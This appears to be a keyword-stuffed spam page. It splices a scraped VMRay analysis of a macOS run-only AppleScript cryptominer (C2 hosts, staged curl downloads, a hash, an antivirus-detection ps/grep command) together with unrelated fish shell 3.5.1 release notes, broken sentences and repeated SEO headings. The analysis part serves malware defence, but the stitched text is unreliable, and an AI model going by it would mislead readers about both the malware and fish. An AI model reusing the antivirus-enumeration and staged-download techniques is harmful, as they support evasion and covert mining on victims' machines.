The Network Tab shows multiple C2 connections. The first request to budaybu100001com:8080 returns the second-stage URL embedded in the string “-=-=-=” as a marker.
Interestingly, there are two URLs that were returned. The second one might be a fallback or used by another variant of the family. The second stage is another compiled AppleScript stored at ~/Library/11.png. #YEARS RUNONLY APPLESCRIPTS AVOID DETECTION FOR DOWNLOAD#ĭownload and extract the third stage mining payload.The second stage is again executed using “osascript” and has two main tasks: All downloads are performed using curl which is clearly visible in the Behavior Tab. Write the mining configuration (pools.txt, config.txt, cpu.txt).
MALWARE YEARS RUNONLY TO AVOID DETECTION ZIP FILE
The third stage is a zip file containing two dynamic libraries (dylibs) and finally a Mach-O binary, again disguised as a PLIST which can be clearly seen in the Files Tab. #YEARS RUNONLY APPLESCRIPTS AVOID DETECTION FOR ZIP FILE# In addition, the second stage uses the system tool “caffeinate” to prevent the machine from going to sleep while the first stage will continuously query the running processes for common AV programs using the ps command: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk ''Īll of these actions are performed using sub-processes so they can be observed in the process graph and process overview.Īs we can see, this sample uses a different kind of evasion, using a rather uncommon file type, a compiled AppleScript, disguised as a PLIST file. This file type won’t have a problem running on a victim’s machine but it is difficult for security teams to analyze because of the inherent obfuscation and limited tooling available. Running the sample in VMRay gives analysts an immediate view into the key behaviors, characteristics, and IOCs.
MALWARE YEARS RUNONLY TO AVOID DETECTION MANUAL
Within 2 minutes of analysis time, analysts can see a majority of the sample’s behavior, compared to hours of manual reverse engineering. Hxxp://ondayoncom:8080/ondayon.Release notes ¶ fish 3.5.1 (released July 20, 2022) ¶ And for deeper analysis, the second and third stages are visible and available from the VMRay Analyzer Report.Ĭom.apple.4V.plist df550039acad9e637c7c3ec2a629abf8b3f35faca18e58d447f490cf23f114e8 #YEARS RUNONLY APPLESCRIPTS AVOID DETECTION FOR MANUAL# This release of fish introduces the following small enhancements:Ĭursor shaping for Vi mode is enabled by default in tmux, and will be used if the outer terminal is capable ( #8981).
Printf returns a better error when used with arguments interpreted as octal numbers ( #9035). History merge when in private mode is now an error, rather than wiping out other sessions’ history ( #9050). The error message when launching a command that is built for the wrong architecture on macOS is more helpful ( #9052). This release also fixes a number of problems identified in fish 3.5.0.Ĭompleting git blame or git -C works correctly ( #9053). On terminals that emit a CSI u sequence for Shift- Space, fish inserts a space instead of printing an error. Status fish-path on Linux-based platforms could print the path with a “ (deleted)” suffix (such as /usr/bin/fish (deleted)), which is now removed ( #9019).Ĭancelling an initial command (from fish’s -init-command option) with Control- C no longer prevents configuration scripts from running ( #9024).
0 kommentar(er)
